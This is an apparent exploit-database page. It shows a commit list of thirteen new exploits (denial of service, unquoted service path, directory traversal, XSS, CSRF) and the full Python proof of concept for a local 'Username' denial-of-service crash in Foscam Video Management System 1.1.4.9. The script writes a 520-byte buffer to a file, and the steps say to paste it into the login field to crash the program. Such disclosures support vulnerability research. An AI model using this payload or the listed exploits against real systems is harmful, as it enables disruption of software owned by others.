3e9ff5a927
13 changes to exploits/shellcodes iSmartViewPro 1.3.34 - Denial of Service (PoC) Open Proficy HMI-SCADA 5.0.0.25920 - 'Password' Denial of Service (PoC) Foscam Video Management System 1.1.4.9 - 'Username' Denial of Service (PoC) Emerson PAC Machine Edition 9.70 Build 8595 - 'FxControlRuntime' Unquoted Service Path ASUS HM Com Service 1.00.31 - 'asHMComSvc' Unquoted Service Path MobileGo 8.5.0 - Insecure File Permissions NCP_Secure_Entry_Client 9.2 - Unquoted Service Paths nipper-ng 0.11.10 - Remote Buffer Overflow (PoC) Lexmark Services Monitor 2.27.4.0.39 - Directory Traversal Crystal Live HTTP Server 6.01 - Directory Traversal Centova Cast 3.2.11 - Arbitrary File Download TemaTres 3.0 - Cross-Site Request Forgery (Add Admin) TemaTres 3.0 - 'value' Persistent Cross-site Scripting
23 lines
No EOL
803 B
Python
Executable file
23 lines
No EOL
803 B
Python
Executable file
# Exploit Title: Foscam Video Management System 1.1.4.9 - 'Username' Denial of Service (PoC)
|
|
# Author: chuyreds
|
|
# Discovery Date: 2019-11-16
|
|
# Vendor Homepage: https://www.foscam.es/
|
|
# Software Link : https://www.foscam.es/descarga/FoscamVMS_1.1.4.9.zip
|
|
# Tested Version: 1.1.4.9
|
|
# Vulnerability Type: Denial of Service (DoS) Local
|
|
# Tested on OS: Windows 10 Pro x64 es
|
|
|
|
# Steps to Produce the Crash:
|
|
# 1.- Run python code : python foscam-vms-uid-dos.py
|
|
# 2.- Open FoscamVMS1.1.4.9.txt and copy its content to clipboard
|
|
# 3.- Open FoscamVMS
|
|
# 4.- Go to Add Device
|
|
# 5.- Choose device type "NVR"/"IPC"
|
|
# 6.- Copy the content of the file into Username
|
|
# 7.- Click on Login Check
|
|
# 8.- Crashed
|
|
|
|
buffer = "\x41" * 520
|
|
f = open ("FoscamVMS_1.1.4.9.txt", "w")
|
|
f.write(buffer)
|
|
f.close() |